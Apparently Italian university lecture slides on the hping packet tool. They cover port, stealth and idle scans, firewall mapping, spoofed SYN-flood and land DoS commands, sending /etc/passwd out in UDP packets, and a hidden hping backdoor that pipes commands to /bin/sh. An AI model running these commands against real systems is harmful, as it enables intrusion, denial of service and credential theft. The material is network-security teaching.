Introduzione ad hping

Documenti analoghi
Introduzione ad hping

Attacchi di rete. Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007

Sicurezza delle reti 1. Lezione IV: Port scanning. Stato di una porta. Port scanning. Mattia Monga. a.a. 2010/11

Sicurezza delle reti. Monga. Ricognizione. Scanning Breve ripasso socket Network mapping Port Scanning NMAP. Le tecniche di scanning

Esercitazione 05. Sommario. Packet Filtering [ ICMP ] Esercitazione Descrizione generale. Angelo Di Iorio (Paolo Marinelli)

Il protocollo TCP. Obiettivo. Procedura

Sicurezza delle reti. Monga. Ricognizione. Scanning Network mapping Port Scanning NMAP. Le tecniche di scanning. Ping. Sicurezza delle reti.

Transmission Control Protocol

Introduzione allo sniffing

Prof. Mario Cannataro Ing. Giuseppe Pirrò

Elementi sull uso dei firewall

DOMOTICA ED EDIFICI INTELLIGENTI UNIVERSITA DI URBINO

Esercitazione 5 Firewall

OpenVPN: un po di teoria e di configurazione

Introduzione. Concetti Preliminari Obiettivi. Portscanning. Scan Detector. Modello TCP/IP Three Way Handshake

Sicurezza delle reti. Monga. Il livello di trasporto. Problemi di sicurezza intrinseci. Riassunto. Porte. Sicurezza delle reti.

Network Intrusion Detection

Strumenti per la raccolta di informazioni sulla rete - Information gathering -

Sicurezza nelle reti

OpenVPN: un po di teoria e di configurazione

Prova in itinere - Rete Internet (ing. Giovanni Neglia) Mercoledì 23 Maggio 2007, ore 15.00

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 7 Febbraio 2005, ore 15.00

Corso di Sicurezza nelle reti a.a. 2009/2010. Soluzioni dei quesiti sulla seconda parte del corso

Introduzione. Scansione dei servizi di rete. Le porte (1) Internet Protocol. Le porte (2) Port Scanning. Cenni preliminari PortScan Satan Saint

Il firewall Packet filtering statico in architetture avanzate

esercizi su sicurezza delle reti maurizio pizzonia sicurezza dei sistemi informatici e delle reti

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A Pietro Frasca. Parte II Lezione 5

Sicurezza delle reti 1. Uso di variabili. Mattia Monga. a.a. 2010/11

UDP. Livello di Trasporto. Demultiplexing dei Messaggi. Esempio di Demultiplexing

Tre catene (chains) di base, si possono definire altre catene (convenzionalmente in minuscolo)

Lezione n.9 LPR- Informatica Applicata

Attacchi di rete. Alessandro Reina Aristide A.A

ICMP OSI. Internet Protocol Suite. Telnet FTP SMTP SNMP TCP e UDP NFS. Application XDR. Presentation. Session RPC. Transport.

Corso di Laurea in Ingegneria Informatica. Corso di Reti di Calcolatori I

BOLLETTINO DI SICUREZZA INFORMATICA

Antonio Cianfrani. Extended Access Control List (ACL)

FIREWALL. Firewall - modello OSI e TCP/IP. Gianluigi Me. me@disp.uniroma2.it Anno Accademico 2005/06. Modello OSI. Modello TCP/IP. Application Gateway

Crittografia e sicurezza delle reti. Firewall

Firewall e NAT A.A. 2005/2006. Walter Cerroni. Protezione di host: personal firewall

Corso di Laurea in Ingegneria Informatica. Corso di Reti di Calcolatori a.a. 2009/10

Sicurezza nelle applicazioni multimediali: lezione 9, firewall. I firewall

/00$)#)+#// )#$ $ )""#,+#)#())# "# #$##( #%# $ )/ #//, #/ $#%# $# )""# +# $ +,+#) 1/-- $234&( + 20%)* /&) 6 / /00$)#"( 7 6$

BOLLETTINO DI SICUREZZA INFORMATICA


Progettare un Firewall

Laboratorio di Networking Operating Systems. Lezione 2 Principali strumenti di diagnostica

Corso di Network Security a.a. 2012/2013. Raccolta di alcuni quesiti sulla SECONDA parte del corso

I protocolli UDP e TCP

Reti di Calcolatori. Il software

CORSO DI RETI SSIS. Lezione n.2. 2 Novembre 2005 Laura Ricci

Internet Control Message Protocol ICMP. Struttura di un Messaggio ICMP. Segnalazione degli Errori

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00

J+... J+3 J+2 J+1 K+1 K+2 K+3 K+...

Comunicazione tra Computer. Protocolli. Astrazione di Sottosistema di Comunicazione. Modello di un Sottosistema di Comunicazione

Prof. Filippo Lanubile

MODELLO CLIENT/SERVER. Gianluca Daino Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena

HTTP adaptation layer per generico protocollo di scambio dati

Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it

Rete Internet Prova in Itinere Mercoledì 23 Aprile 2008

Programmazione dei socket con TCP #2

Università degli Studi di Pisa Dipartimento di Informatica. NAT & Firewalls

ImporterONE Export Plugin Magento

Packet Filter in LINUX (iptables)

ALL FOR SCAN Versione Twain Manuale Utente. Versione 2.0A00. Luccarelli Srl

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00

Il coltellino svizzero della sicurezza

Sicurezza nelle Reti Prova d esame Laboratorio

Esempio quesiti d esame per il laboratorio del corso. Reti di Comunicazione ed Internet Mod 2, Prof. G. A. Maier

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Internetworking TCP/IP: esercizi

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall

Corso di recupero di sistemi Lezione 8

Dipartimento di Ingegneria dell Informazione e Metodi Matematici Laboratorio di Reti Prof. Fabio Martignon

ARP SPOOFING - Papaleo Gianluca

ARP/RARP. Problema della Risoluzione dell Indirizzo. Corrispondenza statica e dinamica. Scenari

Protocollo ICMP, comandi ping e traceroute

Il Mondo delle Intranet

Laboratorio di Reti Esercitazione N 2-DNS Gruppo 9. Laboratorio di Reti Relazione N 2. Mattia Vettorato Alberto Mesin

Firewall e Abilitazioni porte (Port Forwarding)

Parte II: Reti di calcolatori Lezione 13

Network Scanning: Tecniche & Politiche

Inizializzazione degli Host. BOOTP e DHCP

ImporterOne Manuale Export Plugin Prestashop

Manuale per la configurazione di AziendaSoft in rete

SPDY & QUIC 29/11/2014

Introduzione ai protocolli di rete Il protocollo NetBEUI Il protocollo AppleTalk Il protocollo DLC Il protocollo NWLink Il protocollo TCP/IP

Analisi dei rischi della system call chroot e un valido sostituto: le jail. Marco Trentini mt@datasked.com

Reti di Telecomunicazione Lezione 6

University of Modena and Reggio Emilia. Laboratorio di Comunicazioni Multimediali WIRESHARK. Daniela Saladino

Lezione 1 Introduzione

Modulo 1.3 Reti e servizi

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione

Introduzione a Wireshark Andrea Atzeni < shocked@polito.it > Marco Vallini < marco.vallini@polito.it >

OpenVAS - Open Source Vulnerability Scanner

IL LIVELLO TRASPORTO Protocolli TCP e UDP

Uso di sniffer ed intercettazione del traffico IP

Zeroshell: VPN Lan-to-Lan. Il sistema operativo multifunzionale. creato da

MC-link Lan+ Connessione e configurazione del router PRESTIGE 100

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Venerdì 18 Febbraio 2005, ore 9.30

Laboratorio di Informatica Corso di laurea in Lingue e Studi interculturali. AA Paola Zamperlin. Internet. Parte prima

Transcript:

Introduzione ad hping Andrea Lanzi, Davide Marrone, Roberto Paleari Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Corso di Laurea in Informatica 10 gennaio 2007

Sommario 1 Funzionalità hping2 2 scanning servizi di rete 3 Firewall mapping 4 hping come tool DoS 5 Trasferimento file via ICMP, UDP, TCP 6 hping come Trojan

Introduzione hping Caratteristiche del tool hping è un network tool capace sia di creare pacchetti di rete sia di sniffare pacchetti. hping gestisce la frammentazione, gestisce pacchetti di grandezza arbitraria e l incapsulamento di protocolli. È portabile su molte architetture UNIX-like: Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X. È stato creato e sviluppato da un Italiano Salvatore Sanfilippo a.k.a antirez.

Funzionalità dello strumento hping Funzionalità hping testing di Firewall. tecnica di scanning avanzata. test delle reti, utilizzando diversi protocolli, TOS, frammentazione. path MTU discovery manuale. traceroute avanzato, con supporto a tutti i protocolli. Remote OS fingerprinting. Remote uptime guessing. TCP/IP stack auditing. strumento didattico per la comprensione dei protocolli di rete.

hping come scanner (1) L attività di scanning del sistema permette ad un attaccante di reperire informazioni su quali porte (servizi di rete) sono aperti o filtrati sull host vittima. Esempio di Syn scan # hping -S idea.sec.dico.unimi.it -p 80 HPING idea.sec.dico.unimi.it (ppp0 159.149.155.69):... len=44 ip=159.149.155.69 ttl=50 DF id=0 sport=80 flags=sa seq=0 len=44 ip=159.149.155.69 ttl=50 DF id=0 sport=80 flags=sa seq=1... Se la risposta di ritorno contiene SA (syn/ack) allora la porta è aperta, se la risposta è RA (reset/ack) allora la porta è chiusa.

hping come scanner (2) Con hping si possono specificare tutti i flag TCP coinvolti per poter effettuare altri tipi di stealth scan: -F fin imposta FIN flag -S syn imposta SYN flag -R rst imposta RST flag -P push imposta PUSH flag -A ack imposta ACK flag -U urg imposta URG flag -X xmas imposta X flag -F ymas imposta Y flag

hping come scanner (3) Per poter effettuare l attività di scanning su diverse porte della macchina vittima tramite hping possiamo eseguire il seguente comando: # hping -S idea.sec.dico.unimi.it -p ++22 HPING idea.sec.dico.unimi.it (ppp0 159.149.155.69): len=40 ip=159.149.155.69 ttl=241 DF id=0 sport=22 flags=ra seq=0 len=40 ip=159.149.155.69 ttl=241 DF id=0 sport=23 flags=ra seq=1...

hping come scanner (4) Con hping si possono specificare tutti le opzioni del TCP potendo creare tutte le tecniche di scan: opzioni TCP -s baseport porta sorgente -p destport porta destinazione -w win grandezza finestra TCP -Q seqnum mostra numero di sequenza -b badcheck pachetto con checksum errato -M setseq imposta il numero di sequenza TCP -L setack imposta TCP ack

Idle scanning (1) L idle scan è una nuova tipologia di scanning inventata dallo stesso autore di hping, antirez. Ipotesi per L Idle scan (1) tre attori: il server vittima, una macchina chiamata Dumb, e la macchina da cui viene effettuato lo scan. La macchina Dumb, incrementa in modo sequenziale l ID (Identification). La macchina Dumb non deve generare altro tipo di traffico di rete. possibilità di effettuare lo spoofing tra la macchina server e la macchina da cui parte lo scan.

Scenario: Idle scan Scenario L Idle scan La macchina da cui parte lo scan, pinga continuamente la macchina Dumb, e vede nei pacchetti di ritorno la risposta con id incrementato di 1. La macchina scan invia un pacchetto spoofato, indirizzo sorgente della macchina Dumb, TCP con syn attivato su una determinata porta all host vittima.

Scenario: Idle scan (2) Scenario L Idle scan (2) si possono ricevere due tipo di risposte: SYN/ACK o RST, nel caso di RST, la macchina Dumb non creerà nessun nuovo pacchetto e cosi l ID rimarrà uguale. nel caso del SYN/ACK la macchina Dumb, risponderà con un RST e l ID sarà incrementato di 1.

Comandi hping: Idle scan Di seguito si vede la comunicazione con la macchina Dumb e lo spoofing del pacchetto inviato dall attaccante verso la vittima: # hping -I eth0 -SA -r 192.168.10.1 HPING 192.168.10.1 (eth0 192.168.10.1): SA set, 40 headers + 0 data bytes len=46 ip=192.168.10.1 flags=r seq=0 ttl=255 id=18 win=0... len=46 ip=192.168.10.1 flags=r seq=1 ttl=255 id=+1 win=0... len=46 ip=192.168.10.1 flags=r seq=2 ttl=255 id=+1 win=0...... # hping -I eth0 -a 192.168.10.1 -S 192.168.10.33 -p ++20 HPING 192.168.10.33 (eth0 192.168.10.33): S set, 40 headers + 0 data bytes...

Comandi hping: Idle scan La continua comunicazione con la macchina Dumb mostra che la porta 21 nel server vittima risulta nello stato open: # hping -I eth0 -r -S 192.168.10.1 -p 2000 HPING 192.168.10.1 (eth0 192.168.10.1): S set, 40 headers + 0 data bytes len=46 ip=192.168.10.1 flags=ra seq=86 ttl=255 id=+1 win=0... len=46 ip=192.168.10.1 flags=ra seq=87 ttl=255 id=+2 win=0... (port 21)

Firewall mapping con hping Questa tecnica è utilizzata, per poter comprendere una topologia della rete, capire se ci sono firewall, funzionalità di traceroute. # hping3 -z -t 1 -S idea.sec.dico.unimi.it -p 22 TTL 0 during transit from ip=192.168.200.3 3: TTL 0 during transit from ip=151.6.25.67... 13: TTL 0 during transit from ip=159.149.99.18 14: TTL 0 during transit from ip=159.149.129.2 16: len=40 ip=159.149.155.69 ttl=240 DF id=0 sport=22 flags=ra seq=16 win=0 rtt=73.9 ms Con questa tecnica si implementa il firewalking, potendo utilizzare però tutti i protocolli.

syn attack hping può essere usato come tool DoS per testare IDS e firewall. Un esempio può essere syn attack. Con il seguente comando si effettua un attacco DoS # hping -a 192.168.200.2 -S 192.168.200.3 -p 80 -i u1000 -a spoof hostname, setta l indirizzo sorgente del host -S flag syn attivato -p porta destinazione -i intervallo di tempo per la spedizione dei pacchetti, e.g. u1000 (1000 microsecondi).

Land attack Un altro esempio di DoS, come consumo di risorse del sistema si può eseguire il seguente comando: # hping -S -a 192.168.200.2 192.168.200.2 -p 80 -i u1000 -a spoof hostname, setta l indirizzo sorgente del host -p porta destinazione -i intervallo di tempo per la spedizione dei pacchetti, e.g. u1000 (1000 microsecondi).

Spoofing control hping può essere utilizzato per testare la protezione dello spoofing su un firewall. # hping -S -a 192.168.200.2 159.149.153.2 -p 80 -i u1000 -S flag syn attivato -a indirizzo sorgente -p porta destinazione -i intervallo temporale di invio pacchetti

Trasferimento file È inoltre possibile inserire delle signature, valori ascii all interno del campo dati dei pacchetti. [host_a] # hping2 host_b --udp -p 53 -d 100 --sign signature --safe --file /etc/passwd [host_b] # hping2 host_a --listen signature --safe --udp sign inserisce la signature ascii nel campo data safe ritrasmissione dei pacchetti persi (e.g. UDP) file dati da trasmettere nel campo data Quando i dati arrivano dalla parte dell host B viene eseguito il dump dalla signature in poi.

hping come Trojan (1) può essere usato come backdoor, su una macchina compromessa. Il seguente esempio è preso da un esempio di Antirez stesso. victim# hping -I eth0 --listen mysign /bin/sh evil$ telnet victim 25 Trying 192.168.1.1... Connected to nano (192.168.1.1). Escape character is ^]. 220 nano.marmoc.net ESMTP Sendmail mysignls;

hping come Trojan(2) Nel host vittima verrà mostrato l output del comando victim# hping -I eth0-9 mysign /bin/sh hping2 listen mode bin cdrom etc home local-home mnt root tmp var boot dev export lib lost+found proc sbin usr